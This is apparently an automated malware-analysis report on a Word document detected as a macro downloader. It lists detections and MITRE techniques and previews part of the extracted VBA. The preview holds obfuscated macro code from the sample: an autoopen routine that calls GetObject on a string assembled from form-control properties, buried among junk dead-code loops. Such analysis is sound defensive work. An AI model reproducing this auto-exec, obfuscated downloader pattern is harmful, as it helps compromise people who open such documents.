MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing a critical ClamAV detection for 'Doc.Downloader.W2000m-6931474-0'. Heuristics indicate the presence of a high-severity 'AutoOpen' VBA macro, which is designed to execute automatically upon opening the document. This macro likely functions as a downloader for a second-stage payload, a common technique for initial compromise via spearphishing attachments.
Heuristics 7
-
ClamAV: Doc.Downloader.W2000m-6931474-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.W2000m-6931474-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25554 bytes |
SHA-256: ed0ca1e148ea16b2097240ce0d9379d71c88be9ada89b3789ff066ed1bc796ef |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "SoBAx4Q_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "lCUAGAAA"
Attribute VB_Base = "0{3263766E-7C9C-47D2-AE03-9A7A2FD40320}{847C4CF5-27AF-41D9-9E48-5742A3481441}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "nZAAGA"
Attribute VB_Base = "0{97C82851-8294-4A0B-B3B1-E6E4CF654E26}{92DD151C-C2FD-4924-8CAF-B0D86C5F7422}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "SAZBwAA"
Function PZAXUC()
If 639395081 = 468523898 Then
For dAAZADU = WAAUAw To sXAAQA
DBAAAAQA = 980213482 / CStr(d__XAUQ) + 613564320 * CStr(HAcXoQ) * 288192246 - Oct(30763785 * Fix(801516249) / 784304585 + Sqr(cAQ4xDx_)) - VoxGUckA + 250966079 - 209934578 + 723991384 - (aB4AAZwX - 55487804)
Next
End If
If 945740520 = 508345263 Then
For rBAUkA = kAQQxDo To w4AAADk
KBxGCUD = 34830500 / CStr(RwGAGUDB) + 248530036 * CStr(iUCQcoQC) * 97792482 - Oct(733076257 * Fix(508183140) / 578566676 + Sqr(wZABAAc)) - Pw11CB + 644895721 - 264944543 + 882671420 - (cBDkcA4 - 83975010)
Next
End If
End Function
Sub autoopen()
X4kAC41
End Sub
Function X4kAC41()
On Error Resume Next
If 381415662 = 523643351 Then
For WkZGQB = qoDAQDAD To bACGUcoB
DABAXA1A = 34350519 / CStr(XA1QQo) + 101051936 * CStr(BDBQx41Q) * 407000685 - Oct(530859863 * Fix(799781708) / 192496404 + Sqr(hcAAwAD)) - hQAAGo + 159937639 - 89850658 + 786649042 - (iUCxABAQ - 236446602)
Next
End If
If 62481451 = 976692641 Then
For cUQAUwQA = iQ_D4Q1A To jkB1AAD
tZGUQDAA = 62983889 / CStr(KDGAAZAA) + 96168501 * CStr(MoGxAk_A) * 647079346 - Oct(861966998 * Fix(418455363) / 250041282 + Sqr(vAUxA_)) - UA4_AkAA + 445343745 - 19784712 + 46295573 - (oAQAXB - 409519397)
Next
End If
If 122537323 = 539913252 Then
For hUcUA4 = PDoAUcAA To ABAAAcX
RUBAQUAG = 976554037 / CStr(RB4ABDQ) + 398762865 * CStr(EZAUQ_) * 638990164 - Oct(489861830 * Fix(644945482) / 998182612 + Sqr(rDA_AD)) - PAA1A_c + 999378808 - 588087166 + 694752590 - (LQAwxAwA - 105952207)
Next
End If
Set ZZckD1Z = GetObject(lCUAGAAA.tBDQAAoA.ControlTipText + nZAAGA.AQAZAGAk + lCUAGAAA.tBDQAAoA.ControlSource)
If 409540675 = 675461125 Then
For jDDBG4A = YcADXAB To zXoxDQ
wAAccG = 407708567 / CStr(QCQ_AoD) + 428772201 * CStr(Q__DoAA) * 680895855 - Oct(438820134 * Fix(770408561) / 611593776 + Sqr(s_A1QA_)) - Y4k4QA + 182914664 - 303434149 + 807868678 - (OAQQDAD - 845700435)
Next
End If
If 959612820 = 505739522 Then
For HCUxwAAA = jAw4XAA To ZAU_CX1
dxUkBww = 716295241 / CStr(tZCAAC) + 553326967 * CStr(KZCBCcxU) * 450225869 - Oct(486869772 * Fix(458924647) / 834246545 + Sqr(fDAABCx)) - PBkAQDD + 516606343 - 387752068 + 870531449 - (wAAAABAQ - 229425470)
Next
End If
If 433605227 = 419107072 Then
For WDkC4AQ = mAA4xAA To twQAkAX
CkAXAc = 168779632 / CStr(oAAAUo) + 29631811 * CStr(DQCDACB) * 545900391 - Oct(179726372 * Fix(74373340) / 107750793 + Sqr(mAGUGA)) - JA__GDCA + 802696639 - 655428173 + 304750702 - (GAwUADA - 596551354)
Next
End If
If 841638 = 841638 Then
If 607591849 = 416548192 Then
For jQCBBAU = BA4CAGAk To CBQ_QXX
wcxAA4Z = 837683094 / CStr(qwAGDC) + 435626955 * CStr(DDZkCC) * 357144838 - Oct(519124385 * Fix(901466208) / 63243981 + Sqr(TQA1Axw)) - qBAkBwA + 171925464 - 675244765 + 531749641 - (wGAUBD - 84752475)
Next
End If
If 361246655 = 242944774 Then
For zABZ1CAA = KxwGXUQB To aU_o
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.